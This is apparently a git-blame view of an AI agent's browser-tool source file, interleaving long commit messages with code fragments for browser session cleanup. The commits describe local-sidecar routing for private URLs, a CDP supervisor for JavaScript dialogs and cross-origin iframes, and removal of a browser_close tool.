- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
Closes both the agent - browser / Browserbase session and Camofox sessions .
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
When ` ` task_id ` ` is a bare task identifier ( no ` ` : : local ` ` suffix ) , reaps
BOTH the cloud / primary session AND any hybrid - routing local sidecar that
may have been spawned for LAN / localhost URLs in the same task . When
` ` task_id ` ` already carries a ` ` : : local ` ` suffix ( called from the inactivity
cleanup loop against a specific session key ) , reaps only that one .
2026-01-29 06:10:24 +00:00
Args :
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
task_id : Task identifier ( or explicit session key )
2026-01-29 06:10:24 +00:00
"""
if task_id is None :
task_id = " default "
feat(browser): CDP supervisor — dialog detection + response + cross-origin iframe eval (#14540)
* docs: browser CDP supervisor design (for upcoming PR)
Design doc ahead of implementation — dialog + iframe detection/interaction
via a persistent CDP supervisor. Covers backend capability matrix (verified
live 2026-04-23), architecture, lifecycle, policy, agent surface, PR split,
non-goals, and test plan.
Supersedes #12550.
No code changes in this commit.
* feat(browser): add persistent CDP supervisor for dialog + frame detection
Single persistent CDP WebSocket per Hermes task_id that subscribes to
Page/Runtime/Target events and maintains thread-safe state for pending
dialogs, frame tree, and console errors.
Supervisor lives in its own daemon thread running an asyncio loop;
external callers use sync API (snapshot(), respond_to_dialog()) that
bridges onto the loop.
Auto-attaches to OOPIF child targets via Target.setAutoAttach{flatten:true}
and enables Page+Runtime on each so iframe-origin dialogs surface through
the same supervisor.
Dialog policies: must_respond (default, 300s safety timeout),
auto_dismiss, auto_accept.
Frame tree capped at 30 entries + OOPIF depth 2 to keep snapshot
payloads bounded on ad-heavy pages.
E2E verified against real Chrome via smoke test — detects + responds
to main-frame alerts, iframe-contentWindow alerts, preserves frame
tree, graceful no-dialog error path, clean shutdown.
No agent-facing tool wiring in this commit (comes next).
* feat(browser): add browser_dialog tool wired to CDP supervisor
Agent-facing response-only tool. Schema:
action: 'accept' | 'dismiss' (required)
prompt_text: response for prompt() dialogs (optional)
dialog_id: disambiguate when multiple dialogs queued (optional)
Handler:
SUPERVISOR_REGISTRY.get(task_id).respond_to_dialog(...)
check_fn shares _browser_cdp_check with browser_cdp so both surface and
hide together. When no supervisor is attached (Camofox, default
Playwright, or no browser session started yet), tool is hidden; if
somehow invoked it returns a clear error pointing the agent to
browser_navigate / /browser connect.
Registered in _HERMES_CORE_TOOLS and the browser / hermes-acp /
hermes-api-server toolsets alongside browser_cdp.
* feat(browser): wire CDP supervisor into session lifecycle + browser_snapshot
Supervisor lifecycle:
* _get_session_info lazy-starts the supervisor after a session row is
materialized — covers every backend code path (Browserbase, cdp_url
override, /browser connect, future providers) with one hook.
* cleanup_browser(task_id) stops the supervisor for that task first
(before the backend tears down CDP).
* cleanup_all_browsers() calls SUPERVISOR_REGISTRY.stop_all().
* /browser connect eagerly starts the supervisor for task 'default'
so the first snapshot already shows pending_dialogs.
* /browser disconnect stops the supervisor.
CDP URL resolution for the supervisor:
1. BROWSER_CDP_URL / browser.cdp_url override.
2. Fallback: session_info['cdp_url'] from cloud providers (Browserbase).
browser_snapshot merges supervisor state (pending_dialogs + frame_tree)
into its JSON output when a supervisor is active — the agent reads
pending_dialogs from the snapshot it already requests, then calls
browser_dialog to respond. No extra tool surface.
Config defaults:
* browser.dialog_policy: 'must_respond' (new)
* browser.dialog_timeout_s: 300 (new)
No version bump — new keys deep-merge into existing browser section.
Deadlock fix in supervisor event dispatch:
* _on_dialog_opening and _on_target_attached used to await CDP calls
while the reader was still processing an event — but only the reader
can set the response Future, so the call timed out.
* Both now fire asyncio.create_task(...) so the reader stays pumping.
* auto_dismiss/auto_accept now actually close the dialog immediately.
Tests (tests/tools/test_browser_supervisor.py, 11 tests, real Chrome):
* supervisor start/snapshot
* main-frame alert detection + dismiss
* iframe.contentWindow alert
* prompt() with prompt_text reply
* respond with no pending dialog -> clean error
* auto_dismiss clears on event
* registry idempotency
* registry stop -> snapshot reports inactive
* browser_dialog tool no-supervisor error
* browser_dialog invalid action
* browser_dialog end-to-end via tool handler
xdist-safe: chrome_cdp fixture uses a per-worker port.
Skipped when google-chrome/chromium isn't installed.
* docs(browser): document browser_dialog tool + CDP supervisor
- user-guide/features/browser.md: new browser_dialog section with
workflow, availability gate, and dialog_policy table
- reference/tools-reference.md: row for browser_dialog, tool count
bumped 53 -> 54, browser tools count 11 -> 12
- reference/toolsets-reference.md: browser_dialog added to browser
toolset row with note on pending_dialogs / frame_tree snapshot fields
Full design doc lives at
developer-guide/browser-supervisor.md (committed earlier).
* fix(browser): reconnect loop + recent_dialogs for Browserbase visibility
Found via Browserbase E2E test that revealed two production-critical issues:
1. **Supervisor WebSocket drops when other clients disconnect.** Browserbase's
CDP proxy tears down our long-lived WebSocket whenever a short-lived
client (e.g. agent-browser CLI's per-command CDP connection) disconnects.
Fixed with a reconnecting _run loop that re-attaches with exponential
backoff on drops. _page_session_id and _child_sessions are reset on each
reconnect; pending_dialogs and frames are preserved across reconnects.
2. **Browserbase auto-dismisses dialogs server-side within ~10ms.** Their
Playwright-based CDP proxy dismisses alert/confirm/prompt before our
Page.handleJavaScriptDialog call can respond. So pending_dialogs is
empty by the time the agent reads a snapshot on Browserbase.
Added a recent_dialogs ring buffer (capacity 20) that retains a
DialogRecord for every dialog that opened, with a closed_by tag:
* 'agent' — agent called browser_dialog
* 'auto_policy' — local auto_dismiss/auto_accept fired
* 'watchdog' — must_respond timeout auto-dismissed (300s default)
* 'remote' — browser/backend closed it on us (Browserbase)
Agents on Browserbase now see the dialog history with closed_by='remote'
so they at least know a dialog fired, even though they couldn't respond.
3. **Page.javascriptDialogClosed matching bug.** The event doesn't include a
'message' field (CDP spec has only 'result' and 'userInput') but our
_on_dialog_closed was matching on message. Fixed to match by session_id
+ oldest-first, with a safety assumption that only one dialog is in
flight per session (the JS thread is blocked while a dialog is up).
Docs + tests updated:
* browser.md: new availability matrix showing the three backends and
which mode (pending / recent / response) each supports
* developer-guide/browser-supervisor.md: three-field snapshot schema
with closed_by semantics
* test_browser_supervisor.py: +test_recent_dialogs_ring_buffer (12/12
passing against real Chrome)
E2E verified both backends:
* Local Chrome via /browser connect: detect + respond full workflow
(smoke_supervisor.py all 7 scenarios pass)
* Browserbase: detect via recent_dialogs with closed_by='remote'
(smoke_supervisor_browserbase_v2.py passes)
Camofox remains out of scope (REST-only, no CDP) — tracked for
upstream PR 3.
* feat(browser): XHR bridge for dialog response on Browserbase (FIXED)
Browserbase's CDP proxy auto-dismisses native JS dialogs within ~10ms, so
Page.handleJavaScriptDialog calls lose the race. Solution: bypass native
dialogs entirely.
The supervisor now injects Page.addScriptToEvaluateOnNewDocument with a
JavaScript override for window.alert/confirm/prompt. Those overrides
perform a synchronous XMLHttpRequest to a magic host
('hermes-dialog-bridge.invalid'). We intercept those XHRs via Fetch.enable
with a requestStage=Request pattern.
Flow when a page calls alert('hi'):
1. window.alert override intercepts, builds XHR GET to
http://hermes-dialog-bridge.invalid/?kind=alert&message=hi
2. Sync XHR blocks the page's JS thread (mirrors real dialog semantics)
3. Fetch.requestPaused fires on our WebSocket; supervisor surfaces
it as a pending dialog with bridge_request_id set
4. Agent reads pending_dialogs from browser_snapshot, calls browser_dialog
5. Supervisor calls Fetch.fulfillRequest with JSON body:
{accept: true|false, prompt_text: '...', dialog_id: 'd-N'}
6. The injected script parses the body, returns the appropriate value
from the override (undefined for alert, bool for confirm, string|null
for prompt)
This works identically on Browserbase AND local Chrome — no native dialog
ever fires, so Browserbase's auto-dismiss has nothing to race. Dialog
policies (must_respond / auto_dismiss / auto_accept) all still work.
Bridge is installed on every attached session (main page + OOPIF child
sessions) so iframe dialogs are captured too.
Native-dialog path kept as a fallback for backends that don't auto-dismiss
(so a page that somehow bypasses our override — e.g. iframes that load
after Fetch.enable but before the init-script runs — still gets observed
via Page.javascriptDialogOpening).
E2E VERIFIED:
* Local Chrome: 13/13 pytest tests green (12 original + new
test_bridge_captures_prompt_and_returns_reply_text that asserts
window.__ret === 'AGENT-SUPPLIED-REPLY' after agent responds)
* Browserbase: smoke_bb_bridge_v2.py runs 4/4 PASS:
- alert('BB-ALERT-MSG') dismiss → page.alert_ret = undefined ✓
- prompt('BB-PROMPT-MSG', 'default-xyz') accept with 'AGENT-REPLY'
→ page.prompt_ret === 'AGENT-REPLY' ✓
- confirm('BB-CONFIRM-MSG') accept → page.confirm_ret === true ✓
- confirm('BB-CONFIRM-MSG') dismiss → page.confirm_ret === false ✓
Docs updated in browser.md and developer-guide/browser-supervisor.md —
availability matrix now shows Browserbase at full parity with local
Chrome for both detection and response.
* feat(browser): cross-origin iframe interaction via browser_cdp(frame_id=...)
Adds iframe interaction to the CDP supervisor PR (was queued as PR 2).
Design: browser_cdp gets an optional frame_id parameter. When set, the
tool looks up the frame in the supervisor's frame_tree, grabs its child
cdp_session_id (OOPIF session), and dispatches the CDP call through the
supervisor's already-connected WebSocket via run_coroutine_threadsafe.
Why not stateless: on Browserbase, each fresh browser_cdp WebSocket
must re-negotiate against a signed connectUrl. The session info carries
a specific URL that can expire while the supervisor's long-lived
connection stays valid. Routing via the supervisor sidesteps this.
Agent workflow:
1. browser_snapshot → frame_tree.children[] shows OOPIFs with is_oopif=true
2. browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF frame_id>,
params={'expression': 'document.title', 'returnByValue': True})
3. Supervisor dispatches the call on the OOPIF's child session
Supervisor state fixes needed along the way:
* _on_frame_detached now skips reason='swap' (frame migrating processes)
* _on_frame_detached also skips when the frame is an OOPIF with a live
child session — Browserbase fires spurious remove events when a
same-origin iframe gets promoted to OOPIF
* _on_target_detached clears cdp_session_id but KEEPS the frame record
so the agent still sees the OOPIF in frame_tree during transient
session flaps
E2E VERIFIED on Browserbase (smoke_bb_iframe_agent_path.py):
browser_cdp(method='Runtime.evaluate',
params={'expression': 'document.title', 'returnByValue': True},
frame_id=<OOPIF>)
→ {'success': True, 'result': {'value': 'Example Domain'}}
The iframe is <iframe src='https://example.com/'> inside a top-level
data: URL page on a real Browserbase session. The agent Runtime.evaluates
INSIDE the cross-origin iframe and gets example.com's title back.
Tests (tests/tools/test_browser_supervisor.py — 16 pass total):
* test_browser_cdp_frame_id_routes_via_supervisor — injects fake OOPIF,
verifies routing via supervisor, Runtime.evaluate returns 1+1=2
* test_browser_cdp_frame_id_missing_supervisor — clean error when no
supervisor attached
* test_browser_cdp_frame_id_not_in_frame_tree — clean error on bad
frame_id
Docs (browser.md and developer-guide/browser-supervisor.md) updated with
the iframe workflow, availability matrix now shows OOPIF eval as shipped
for local Chrome + Browserbase.
* test(browser): real-OOPIF E2E verified manually + chrome_cdp uses --site-per-process
When asked 'did you test the iframe stuff' I had only done a mocked
pytest (fake injected OOPIF) plus a Browserbase E2E. Closed the
local-Chrome real-OOPIF gap by writing /tmp/dialog-iframe-test/
smoke_local_oopif.py:
* 2 http servers on different hostnames (localhost:18905 + 127.0.0.1:18906)
* Chrome with --site-per-process so the cross-origin iframe becomes a
real OOPIF in its own process
* Navigate, find OOPIF in supervisor.frame_tree, call
browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF>) which routes
through the supervisor's child session
* Asserts iframe document.title === 'INNER-FRAME-XYZ' (from the
inner page, retrieved via OOPIF eval)
PASSED on 2026-04-23.
Tried to embed this as a pytest but hit an asyncio version quirk between
venv (3.11) and the system python (3.13) — Page.navigate hangs in the
pytest harness but works in standalone. Left a self-documenting skip
test that points to the smoke script + describes the verification.
chrome_cdp fixture now passes --site-per-process so future iframe tests
can rely on OOPIF behavior.
Result: 16 pass + 1 documented-skip = 17 tests in
tests/tools/test_browser_supervisor.py.
* docs(browser): add dialog_policy + dialog_timeout_s to configuration.md, fix tool count
Pre-merge docs audit revealed two gaps:
1. user-guide/configuration.md browser config example was missing the
two new dialog_* knobs. Added with a short table explaining
must_respond / auto_dismiss / auto_accept semantics and a link to
the feature page for the full workflow.
2. reference/tools-reference.md header said '54 built-in tools' — real
count on main is 54, this branch adds browser_dialog so it's 55.
Fixed the header. (browser count was already correctly bumped
11 -> 12 in the earlier docs commit.)
No code changes.
2026-04-23 22:23:37 -07:00
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
# Expand to the full set of session keys to reap. For a bare task_id
# that includes the cloud/primary key + the local sidecar if one exists.
if _is_local_sidecar_key ( task_id ) :
session_keys = [ task_id ]
bare_task_id = task_id [ : - len ( _LOCAL_SUFFIX ) ]
else :
session_keys = [ task_id ]
sidecar_key = f " { task_id } { _LOCAL_SUFFIX } "
with _cleanup_lock :
if sidecar_key in _active_sessions :
session_keys . append ( sidecar_key )
bare_task_id = task_id
for session_key in session_keys :
_cleanup_single_browser_session ( session_key )
# Drop the last-active pointer only when the bare task is being cleaned
# (i.e. not when we're only reaping a sidecar mid-task).
if not _is_local_sidecar_key ( task_id ) :
_last_active_session_key . pop ( bare_task_id , None )
def _cleanup_single_browser_session ( task_id : str ) - > None :
""" Internal: reap a single browser session by its exact session key. """
feat(browser): CDP supervisor — dialog detection + response + cross-origin iframe eval (#14540)
* docs: browser CDP supervisor design (for upcoming PR)
Design doc ahead of implementation — dialog + iframe detection/interaction
via a persistent CDP supervisor. Covers backend capability matrix (verified
live 2026-04-23), architecture, lifecycle, policy, agent surface, PR split,
non-goals, and test plan.
Supersedes #12550.
No code changes in this commit.
* feat(browser): add persistent CDP supervisor for dialog + frame detection
Single persistent CDP WebSocket per Hermes task_id that subscribes to
Page/Runtime/Target events and maintains thread-safe state for pending
dialogs, frame tree, and console errors.
Supervisor lives in its own daemon thread running an asyncio loop;
external callers use sync API (snapshot(), respond_to_dialog()) that
bridges onto the loop.
Auto-attaches to OOPIF child targets via Target.setAutoAttach{flatten:true}
and enables Page+Runtime on each so iframe-origin dialogs surface through
the same supervisor.
Dialog policies: must_respond (default, 300s safety timeout),
auto_dismiss, auto_accept.
Frame tree capped at 30 entries + OOPIF depth 2 to keep snapshot
payloads bounded on ad-heavy pages.
E2E verified against real Chrome via smoke test — detects + responds
to main-frame alerts, iframe-contentWindow alerts, preserves frame
tree, graceful no-dialog error path, clean shutdown.
No agent-facing tool wiring in this commit (comes next).
* feat(browser): add browser_dialog tool wired to CDP supervisor
Agent-facing response-only tool. Schema:
action: 'accept' | 'dismiss' (required)
prompt_text: response for prompt() dialogs (optional)
dialog_id: disambiguate when multiple dialogs queued (optional)
Handler:
SUPERVISOR_REGISTRY.get(task_id).respond_to_dialog(...)
check_fn shares _browser_cdp_check with browser_cdp so both surface and
hide together. When no supervisor is attached (Camofox, default
Playwright, or no browser session started yet), tool is hidden; if
somehow invoked it returns a clear error pointing the agent to
browser_navigate / /browser connect.
Registered in _HERMES_CORE_TOOLS and the browser / hermes-acp /
hermes-api-server toolsets alongside browser_cdp.
* feat(browser): wire CDP supervisor into session lifecycle + browser_snapshot
Supervisor lifecycle:
* _get_session_info lazy-starts the supervisor after a session row is
materialized — covers every backend code path (Browserbase, cdp_url
override, /browser connect, future providers) with one hook.
* cleanup_browser(task_id) stops the supervisor for that task first
(before the backend tears down CDP).
* cleanup_all_browsers() calls SUPERVISOR_REGISTRY.stop_all().
* /browser connect eagerly starts the supervisor for task 'default'
so the first snapshot already shows pending_dialogs.
* /browser disconnect stops the supervisor.
CDP URL resolution for the supervisor:
1. BROWSER_CDP_URL / browser.cdp_url override.
2. Fallback: session_info['cdp_url'] from cloud providers (Browserbase).
browser_snapshot merges supervisor state (pending_dialogs + frame_tree)
into its JSON output when a supervisor is active — the agent reads
pending_dialogs from the snapshot it already requests, then calls
browser_dialog to respond. No extra tool surface.
Config defaults:
* browser.dialog_policy: 'must_respond' (new)
* browser.dialog_timeout_s: 300 (new)
No version bump — new keys deep-merge into existing browser section.
Deadlock fix in supervisor event dispatch:
* _on_dialog_opening and _on_target_attached used to await CDP calls
while the reader was still processing an event — but only the reader
can set the response Future, so the call timed out.
* Both now fire asyncio.create_task(...) so the reader stays pumping.
* auto_dismiss/auto_accept now actually close the dialog immediately.
Tests (tests/tools/test_browser_supervisor.py, 11 tests, real Chrome):
* supervisor start/snapshot
* main-frame alert detection + dismiss
* iframe.contentWindow alert
* prompt() with prompt_text reply
* respond with no pending dialog -> clean error
* auto_dismiss clears on event
* registry idempotency
* registry stop -> snapshot reports inactive
* browser_dialog tool no-supervisor error
* browser_dialog invalid action
* browser_dialog end-to-end via tool handler
xdist-safe: chrome_cdp fixture uses a per-worker port.
Skipped when google-chrome/chromium isn't installed.
* docs(browser): document browser_dialog tool + CDP supervisor
- user-guide/features/browser.md: new browser_dialog section with
workflow, availability gate, and dialog_policy table
- reference/tools-reference.md: row for browser_dialog, tool count
bumped 53 -> 54, browser tools count 11 -> 12
- reference/toolsets-reference.md: browser_dialog added to browser
toolset row with note on pending_dialogs / frame_tree snapshot fields
Full design doc lives at
developer-guide/browser-supervisor.md (committed earlier).
* fix(browser): reconnect loop + recent_dialogs for Browserbase visibility
Found via Browserbase E2E test that revealed two production-critical issues:
1. **Supervisor WebSocket drops when other clients disconnect.** Browserbase's
CDP proxy tears down our long-lived WebSocket whenever a short-lived
client (e.g. agent-browser CLI's per-command CDP connection) disconnects.
Fixed with a reconnecting _run loop that re-attaches with exponential
backoff on drops. _page_session_id and _child_sessions are reset on each
reconnect; pending_dialogs and frames are preserved across reconnects.
2. **Browserbase auto-dismisses dialogs server-side within ~10ms.** Their
Playwright-based CDP proxy dismisses alert/confirm/prompt before our
Page.handleJavaScriptDialog call can respond. So pending_dialogs is
empty by the time the agent reads a snapshot on Browserbase.
Added a recent_dialogs ring buffer (capacity 20) that retains a
DialogRecord for every dialog that opened, with a closed_by tag:
* 'agent' — agent called browser_dialog
* 'auto_policy' — local auto_dismiss/auto_accept fired
* 'watchdog' — must_respond timeout auto-dismissed (300s default)
* 'remote' — browser/backend closed it on us (Browserbase)
Agents on Browserbase now see the dialog history with closed_by='remote'
so they at least know a dialog fired, even though they couldn't respond.
3. **Page.javascriptDialogClosed matching bug.** The event doesn't include a
'message' field (CDP spec has only 'result' and 'userInput') but our
_on_dialog_closed was matching on message. Fixed to match by session_id
+ oldest-first, with a safety assumption that only one dialog is in
flight per session (the JS thread is blocked while a dialog is up).
Docs + tests updated:
* browser.md: new availability matrix showing the three backends and
which mode (pending / recent / response) each supports
* developer-guide/browser-supervisor.md: three-field snapshot schema
with closed_by semantics
* test_browser_supervisor.py: +test_recent_dialogs_ring_buffer (12/12
passing against real Chrome)
E2E verified both backends:
* Local Chrome via /browser connect: detect + respond full workflow
(smoke_supervisor.py all 7 scenarios pass)
* Browserbase: detect via recent_dialogs with closed_by='remote'
(smoke_supervisor_browserbase_v2.py passes)
Camofox remains out of scope (REST-only, no CDP) — tracked for
upstream PR 3.
* feat(browser): XHR bridge for dialog response on Browserbase (FIXED)
Browserbase's CDP proxy auto-dismisses native JS dialogs within ~10ms, so
Page.handleJavaScriptDialog calls lose the race. Solution: bypass native
dialogs entirely.
The supervisor now injects Page.addScriptToEvaluateOnNewDocument with a
JavaScript override for window.alert/confirm/prompt. Those overrides
perform a synchronous XMLHttpRequest to a magic host
('hermes-dialog-bridge.invalid'). We intercept those XHRs via Fetch.enable
with a requestStage=Request pattern.
Flow when a page calls alert('hi'):
1. window.alert override intercepts, builds XHR GET to
http://hermes-dialog-bridge.invalid/?kind=alert&message=hi
2. Sync XHR blocks the page's JS thread (mirrors real dialog semantics)
3. Fetch.requestPaused fires on our WebSocket; supervisor surfaces
it as a pending dialog with bridge_request_id set
4. Agent reads pending_dialogs from browser_snapshot, calls browser_dialog
5. Supervisor calls Fetch.fulfillRequest with JSON body:
{accept: true|false, prompt_text: '...', dialog_id: 'd-N'}
6. The injected script parses the body, returns the appropriate value
from the override (undefined for alert, bool for confirm, string|null
for prompt)
This works identically on Browserbase AND local Chrome — no native dialog
ever fires, so Browserbase's auto-dismiss has nothing to race. Dialog
policies (must_respond / auto_dismiss / auto_accept) all still work.
Bridge is installed on every attached session (main page + OOPIF child
sessions) so iframe dialogs are captured too.
Native-dialog path kept as a fallback for backends that don't auto-dismiss
(so a page that somehow bypasses our override — e.g. iframes that load
after Fetch.enable but before the init-script runs — still gets observed
via Page.javascriptDialogOpening).
E2E VERIFIED:
* Local Chrome: 13/13 pytest tests green (12 original + new
test_bridge_captures_prompt_and_returns_reply_text that asserts
window.__ret === 'AGENT-SUPPLIED-REPLY' after agent responds)
* Browserbase: smoke_bb_bridge_v2.py runs 4/4 PASS:
- alert('BB-ALERT-MSG') dismiss → page.alert_ret = undefined ✓
- prompt('BB-PROMPT-MSG', 'default-xyz') accept with 'AGENT-REPLY'
→ page.prompt_ret === 'AGENT-REPLY' ✓
- confirm('BB-CONFIRM-MSG') accept → page.confirm_ret === true ✓
- confirm('BB-CONFIRM-MSG') dismiss → page.confirm_ret === false ✓
Docs updated in browser.md and developer-guide/browser-supervisor.md —
availability matrix now shows Browserbase at full parity with local
Chrome for both detection and response.
* feat(browser): cross-origin iframe interaction via browser_cdp(frame_id=...)
Adds iframe interaction to the CDP supervisor PR (was queued as PR 2).
Design: browser_cdp gets an optional frame_id parameter. When set, the
tool looks up the frame in the supervisor's frame_tree, grabs its child
cdp_session_id (OOPIF session), and dispatches the CDP call through the
supervisor's already-connected WebSocket via run_coroutine_threadsafe.
Why not stateless: on Browserbase, each fresh browser_cdp WebSocket
must re-negotiate against a signed connectUrl. The session info carries
a specific URL that can expire while the supervisor's long-lived
connection stays valid. Routing via the supervisor sidesteps this.
Agent workflow:
1. browser_snapshot → frame_tree.children[] shows OOPIFs with is_oopif=true
2. browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF frame_id>,
params={'expression': 'document.title', 'returnByValue': True})
3. Supervisor dispatches the call on the OOPIF's child session
Supervisor state fixes needed along the way:
* _on_frame_detached now skips reason='swap' (frame migrating processes)
* _on_frame_detached also skips when the frame is an OOPIF with a live
child session — Browserbase fires spurious remove events when a
same-origin iframe gets promoted to OOPIF
* _on_target_detached clears cdp_session_id but KEEPS the frame record
so the agent still sees the OOPIF in frame_tree during transient
session flaps
E2E VERIFIED on Browserbase (smoke_bb_iframe_agent_path.py):
browser_cdp(method='Runtime.evaluate',
params={'expression': 'document.title', 'returnByValue': True},
frame_id=<OOPIF>)
→ {'success': True, 'result': {'value': 'Example Domain'}}
The iframe is <iframe src='https://example.com/'> inside a top-level
data: URL page on a real Browserbase session. The agent Runtime.evaluates
INSIDE the cross-origin iframe and gets example.com's title back.
Tests (tests/tools/test_browser_supervisor.py — 16 pass total):
* test_browser_cdp_frame_id_routes_via_supervisor — injects fake OOPIF,
verifies routing via supervisor, Runtime.evaluate returns 1+1=2
* test_browser_cdp_frame_id_missing_supervisor — clean error when no
supervisor attached
* test_browser_cdp_frame_id_not_in_frame_tree — clean error on bad
frame_id
Docs (browser.md and developer-guide/browser-supervisor.md) updated with
the iframe workflow, availability matrix now shows OOPIF eval as shipped
for local Chrome + Browserbase.
* test(browser): real-OOPIF E2E verified manually + chrome_cdp uses --site-per-process
When asked 'did you test the iframe stuff' I had only done a mocked
pytest (fake injected OOPIF) plus a Browserbase E2E. Closed the
local-Chrome real-OOPIF gap by writing /tmp/dialog-iframe-test/
smoke_local_oopif.py:
* 2 http servers on different hostnames (localhost:18905 + 127.0.0.1:18906)
* Chrome with --site-per-process so the cross-origin iframe becomes a
real OOPIF in its own process
* Navigate, find OOPIF in supervisor.frame_tree, call
browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF>) which routes
through the supervisor's child session
* Asserts iframe document.title === 'INNER-FRAME-XYZ' (from the
inner page, retrieved via OOPIF eval)
PASSED on 2026-04-23.
Tried to embed this as a pytest but hit an asyncio version quirk between
venv (3.11) and the system python (3.13) — Page.navigate hangs in the
pytest harness but works in standalone. Left a self-documenting skip
test that points to the smoke script + describes the verification.
chrome_cdp fixture now passes --site-per-process so future iframe tests
can rely on OOPIF behavior.
Result: 16 pass + 1 documented-skip = 17 tests in
tests/tools/test_browser_supervisor.py.
* docs(browser): add dialog_policy + dialog_timeout_s to configuration.md, fix tool count
Pre-merge docs audit revealed two gaps:
1. user-guide/configuration.md browser config example was missing the
two new dialog_* knobs. Added with a short table explaining
must_respond / auto_dismiss / auto_accept semantics and a link to
the feature page for the full workflow.
2. reference/tools-reference.md header said '54 built-in tools' — real
count on main is 54, this branch adds browser_dialog so it's 55.
Fixed the header. (browser count was already correctly bumped
11 -> 12 in the earlier docs commit.)
No code changes.
2026-04-23 22:23:37 -07:00
# Stop the CDP supervisor for this task FIRST so we close our WebSocket
# before the backend tears down the underlying CDP endpoint.
_stop_cdp_supervisor ( task_id )
2026-04-08 13:44:58 -07:00
# Also clean up Camofox session if running in Camofox mode.
# Skip full close when managed persistence is enabled — the browser
# profile (and its session cookies) must survive across agent tasks.
# The inactivity reaper still frees idle resources.
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
